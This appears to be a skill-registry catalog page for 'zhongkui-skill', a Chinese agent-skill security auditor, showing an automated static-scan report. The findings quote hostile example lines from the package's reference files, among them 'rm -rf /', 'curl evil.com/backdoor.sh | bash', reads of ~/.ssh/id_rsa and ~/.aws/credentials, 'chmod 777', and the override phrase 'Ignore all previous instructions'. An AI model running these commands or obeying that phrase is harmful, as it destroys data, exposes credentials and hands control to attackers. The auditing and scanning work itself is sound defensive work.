Real Skill packageSource verifiedClawHub registryAutomatic security hold

zhongkui-skill

钟馗.Skill——Agent Skill 安全审查专家。直来直去、快刀斩乱麻,三层审查(静态审计/行为模拟/供应链溯源)覆盖10类风险,输出结构化安全裁定(✅干净/⚠️可疑/🚫恶意)。Use when 用户说"审查这个Skill"、"安全检查"、"钟馗看下"、"审一下"、"查一下这个skill"、安装Skill前的安全评估、或需要审计SKILL.md的恶意载荷。

Identity and source

Publisher attributionebandaoregistry owner unverified by skillvetai
Functional categoryAgent Engineering, Security & Governanceautomatically inferred · 60% rule confidence
Package forminstruction with code26 recorded files
Canonical sourceClawHub registryclawhub:ebandao777-oss:zhongkui-skill
Open canonical source ↗

Platform declarations

These states come from the source or distribution context. None of the entries below are SkillVetAI compatibility test results.

OpenClawnative officialProvenance: registry distribution

Independent structural checks

These checks parse the fixed package against dated platform rules. They do not execute the Skill or verify task behavior.

Claude Codepasses structure
Checker 0.1.0 · agent-skills-2026-08-13+claude-code-docs-2026-08-13 · 8/15/2026.claude/skills/zhongkui-skill

Runtime, accounts, dependencies, permissions, network behavior and task quality remain untested.

OpenAI Codexpasses structure
Checker 0.1.0 · agent-skills-2026-08-13+codex-docs-2026-08-13 · 8/15/2026.agents/skills/zhongkui-skill

Runtime, accounts, dependencies, permissions, network behavior and task quality remain untested.

OpenClawpasses structure
Checker 0.1.0 · agent-skills-2026-08-13+openclaw-docs-2026-08-13 · 8/15/2026skills/zhongkui-skill

Runtime, accounts, dependencies, permissions, network behavior and task quality remain untested.

Installation and inspection

Installation commands are hidden while this fixed release is under an automatic security hold. Review the evidence and canonical source manually.

Security evidence

SkillVetAI static result: critical signal

This automated, non-executing scan is bound to this release hash. It is not a safety certification and may contain false positives or false negatives.

Status
completed
Coverage
full text content
Files
19 / 26 inspected as text
Checked
8/15/2026, 6:51:52 PM
Scanner
0.1.3
Policy
1.0.3
29 automated findings
criticalDestructive command targets a system rootreferences/behavioral-emulation.md:76 · confidence 98%rm -rf /
highRemote content is piped directly to a shellreferences/behavioral-emulation.md:92 · confidence 98%curl evil.com/deploy | bash
highRemote content is piped directly to a shellreferences/risk-taxonomy.md:36 · confidence 98%curl evil.com/backdoor.sh | bash
highInstructions or code access sensitive credential locationsSKILL.md:103 · confidence 85%~/.aws/credentials
highInstructions or code access sensitive credential locationscore/auditor.py:411 · confidence 85%~/.aws/credentials
highInstructions or code access sensitive credential locationsREFERENCE.md:51 · confidence 85%~/.ssh/id_rsa
highInstructions or code access sensitive credential locationsreferences/agent-skill-security-review.md:144 · confidence 85%~/.ssh/id_rsa
highInstructions or code access sensitive credential locationsreferences/behavioral-emulation.md:52 · confidence 85%~/.ssh/id_rsa
highInstructions or code access sensitive credential locationsreferences/fix-strategies.md:33 · confidence 85%~/.ssh/id_rsa
highInstructions or code access sensitive credential locationsreferences/risk-taxonomy.md:46 · confidence 85%~/.ssh/id_rsa
highInstructions or code access sensitive credential locationsreferences/trust-hierarchy.md:43 · confidence 85%~/.aws/credentials
highDynamic code or shell execution is presentSKILL.md:97 · confidence 78%eval(
highDynamic code or shell execution is presentREFERENCE.md:190 · confidence 78%eval(
highDynamic code or shell execution is presentreferences/agent-skill-security-review.md:73 · confidence 78%eval(
highDynamic code or shell execution is presentreferences/fix-strategies.md:58 · confidence 78%eval(
highDynamic code or shell execution is presentreferences/risk-taxonomy.md:36 · confidence 78%os.system(
highDynamic code or shell execution is presentreferences/trust-hierarchy.md:37 · confidence 78%eval(
highEncoded content is decoded and executedSKILL.md:96 · confidence 90%Base64
highEncoded content is decoded and executedREFERENCE.md:54 · confidence 90%Base64
highEncoded content is decoded and executedreferences/agent-skill-security-review.md:73 · confidence 90%Base64
highEncoded content is decoded and executedreferences/fix-strategies.md:228 · confidence 90%Base64
highEncoded content is decoded and executedreferences/trust-hierarchy.md:36 · confidence 90%Base64
mediumPrompt-override language requires reviewREFERENCE.md:49 · confidence 62%Ignore all previous instructions
mediumPrompt-override language requires reviewreferences/agent-skill-security-review.md:142 · confidence 62%Ignore all previous instructions
mediumPrompt-override language requires reviewreferences/behavioral-emulation.md:36 · confidence 62%Ignore all previous instructions
mediumPrompt-override language requires reviewreferences/risk-taxonomy.md:7 · confidence 62%Ignore all previous instructions
mediumWorld-writable permissions are requestedREFERENCE.md:227 · confidence 95%chmod 777
mediumWorld-writable permissions are requestedreferences/agent-skill-security-review.md:69 · confidence 95%chmod 777
mediumWorld-writable permissions are requestedreferences/static-audit.md:34 · confidence 95%chmod 777
22 High/Critical review queue entries
STATIC_DESTRUCTIVE_ROOT_COMMANDpending
STATIC_DOWNLOAD_PIPE_TO_SHELLpending
STATIC_DOWNLOAD_PIPE_TO_SHELLpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_SENSITIVE_CREDENTIAL_ACCESSpending
STATIC_DYNAMIC_CODE_EXECUTIONpending
STATIC_DYNAMIC_CODE_EXECUTIONpending
STATIC_DYNAMIC_CODE_EXECUTIONpending
STATIC_DYNAMIC_CODE_EXECUTIONpending
STATIC_DYNAMIC_CODE_EXECUTIONpending
STATIC_DYNAMIC_CODE_EXECUTIONpending
STATIC_OBFUSCATED_EXECUTIONpending
STATIC_OBFUSCATED_EXECUTIONpending
STATIC_OBFUSCATED_EXECUTIONpending
STATIC_OBFUSCATED_EXECUTIONpending
STATIC_OBFUSCATED_EXECUTIONpending
Open human review queue →
6 inferred permission indicators
  • shell execution — automatically inferred
  • network access — automatically inferred
  • filesystem read — automatically inferred
  • filesystem write — automatically inferred
  • credential access — automatically inferred
  • external write action — automatically inferred
5 dependency and API indicators
  • api: clawhub.ai
  • api: evil-collector.com
  • api: evil.com
  • api: github.com
  • api: unknown-server.com
External clawhub result: clean

This is registry-supplied evidence for the recorded release, not an independent SkillVetAI scan. Check the canonical source for the full report, scanner versions, scope, and current moderation state.

Evidence checked
8/15/2026, 5:55:39 PM
Release binding
Matches this record
  • vt: malicious
  • skillspector: suspicious
  • llm: clean

Recorded files

The catalog stores hashes and an inventory summary for change detection. It does not republish the package contents.

Package content hashsha256:99c3de0bef03a490a4e6c693cfcf9a09dc2caf1ce73e21e5371e387a7fbb032b
Show up to 26 recorded paths
  • .gitattributes
  • core
  • core/__init__.py
  • core/__pycache__
  • core/__pycache__/__init__.cpython-311.pyc
  • core/__pycache__/auditor.cpython-311.pyc
  • core/__pycache__/scorer.cpython-311.pyc
  • core/auditor.py
  • core/scorer.py
  • QUICKSTART.md
  • README.md
  • REFERENCE.md
  • references
  • references/agent-skill-security-review.md
  • references/behavioral-emulation.md
  • references/fix-strategies.md
  • references/paper-mapping.md
  • references/risk-taxonomy.md
  • references/roadmap.md
  • references/scoring.md
  • references/static-audit.md
  • references/supply-chain.md
  • references/trust-hierarchy.md
  • skill-card.md
  • SKILL.md
  • zhongkui.py

Source changelog

- Major refactor and simplification of project structure: removed intel/ and patterns.json, adjusted core modules, and updated references. - Streamlined SKILL.md: now shorter, more direct, with only 10 risk types (R1–R10) and concise instructions; dropped extended usage, exception handling, and advanced scoring formulas. - Auditing checks and references pruned—static audit reduced to 52 items, behavioral emulation to 18 scenarios, and supply chain review to 8 dimensions. - Removed historical, roadmap, capability boundary, and error-handling documentation; kept only essential security review core references and fix strategies. - Output/report format and risk veto rules remain enforced, with stricter alignment to minimalist, operational security review workflows.